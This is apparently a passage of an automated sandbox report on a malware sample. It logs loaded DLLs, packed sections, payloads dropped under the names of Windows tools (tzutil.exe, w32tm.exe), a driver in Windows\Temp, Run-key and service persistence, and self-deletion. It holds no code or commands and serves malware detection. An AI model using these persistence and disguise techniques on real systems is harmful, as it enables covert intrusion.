                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: UZPt0hR.exeStatic file information: File size 1274368 > 1048576
                    Source: UZPt0hR.exeStatic PE information: Raw size of c2 is bigger than: 0x100000 < 0x136000
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C488830 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,5_2_000002684C488830
                    Source: initial sampleStatic PE information: section where entry point is pointing to: c2
                    Source: UZPt0hR.exeStatic PE information: section name: c0
                    Source: UZPt0hR.exeStatic PE information: section name: c1
                    Source: UZPt0hR.exeStatic PE information: section name: c2
                    Source: tzutil.exe.5.drStatic PE information: section name: cv0
                    Source: tzutil.exe.5.drStatic PE information: section name: cv1
                    Source: tzutil.exe.5.drStatic PE information: section name: cv2
                    Source: w32tm.exe.5.drStatic PE information: section name: s00
                    Source: w32tm.exe.5.drStatic PE information: section name: s01
                    Source: w32tm.exe.5.drStatic PE information: section name: s02
                    Source: K47ZW3T_7928.sys.15.drStatic PE information: section name: vs0
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_0042C275 push ecx; ret 0_2_0042C288
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_0049B3CD push ecx; ret 0_2_0049B3E0
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_004075BB push ecx; retf 0000h0_2_004075BC
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_0040A6A2 push eax; ret 0_2_0040A6A3
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_00483B73 push edx; retf 0_2_00483B79
                    Source: C:\Users\user\Desktop\UZPt0hR.exeCode function: 0_2_004F5B0A push esi; ret 0_2_004F5AE9
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_008586F0 push rax; ret 15_2_00858701
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00858748 push rax; retn 0085h15_2_00858759
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_007D2D40 push rcx; iretd 15_2_007D2D43
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeCode function: 15_2_00857E88 push rax; retn 0085h15_2_00857E89
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF88AF4FC95 pushad ; retf 19_2_00007FF88AF4FC97
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF88AF4D2A5 pushad ; iretd 19_2_00007FF88AF4D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF88B0600BD pushad ; iretd 19_2_00007FF88B0600C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF88B060B99 push ds; retf 19_2_00007FF88B060B9A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF88B06ADF8 push E95823A2h; ret 19_2_00007FF88B06AE29
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF88B06BA7A push E85B2AD7h; ret 19_2_00007FF88B06BAF9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF88B06B950 push E85B2AD7h; ret 19_2_00007FF88B06BAF9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF88B132316 push 8B485F93h; iretd 19_2_00007FF88B13231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF88AF2D2A5 pushad ; iretd 21_2_00007FF88AF2D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF88AF2FBB5 pushad ; retf 21_2_00007FF88AF2FBB7
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF88B04BA3D push E85B2CD7h; ret 21_2_00007FF88B04BAF9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF88B0400BD pushad ; iretd 21_2_00007FF88B0400C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF88B117CED push D919C3C6h; ret 21_2_00007FF88B117D72
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF88B112316 push 8B485F95h; iretd 21_2_00007FF88B11231B
                    Source: UZPt0hR.exeStatic PE information: section name: c2 entropy: 7.991367352725959
                    Source: tzutil.exe.5.drStatic PE information: section name: cv2 entropy: 7.982000050808652
                    Source: w32tm.exe.5.drStatic PE information: section name: s02 entropy: 7.959351043402205
                    Source: K47ZW3T_7928.sys.15.drStatic PE information: section name: .text entropy: 7.126561604240753

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeFile created: C:\Windows\Temp\K47ZW3T_7928.sysJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeJump to dropped file
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeFile created: C:\Windows\Temp\K47ZW3T_7928.sysJump to dropped file
                    Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exeJump to dropped file
                    Source: C:\Windows\System32\svchost.exeFile created: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeJump to dropped file
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeFile created: C:\Windows\Temp\K47ZW3T_7928.sysJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Windows\System32\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}Jump to behavior
                    Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\XuH4Y8_7928Jump to behavior
                    Source: C:\Windows\System32\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}Jump to behavior
                    Source: C:\Windows\System32\svchost.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}Jump to behavior
                    Source: C:\Windows\System32\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}Jump to behavior
                    Source: C:\Windows\System32\svchost.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run {57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}Jump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\System32\svchost.exeFile deleted: c:\users\user\desktop\uzpt0hr.exeJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\svchost.exeCode function: 5_2_000002684C488830 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddressForCaller,GetProcAddress,LoadLibraryExW,GetProcAddress,GetProcAddress,5_2_000002684C488830
                    Source: C:\Users\user\Desktop\UZPt0hR.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\{42F09F7D-CA44-409E-A936-E948CF4ECA66} {875376CD-1334-41AA-8A36-0C7105D31883}Jump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
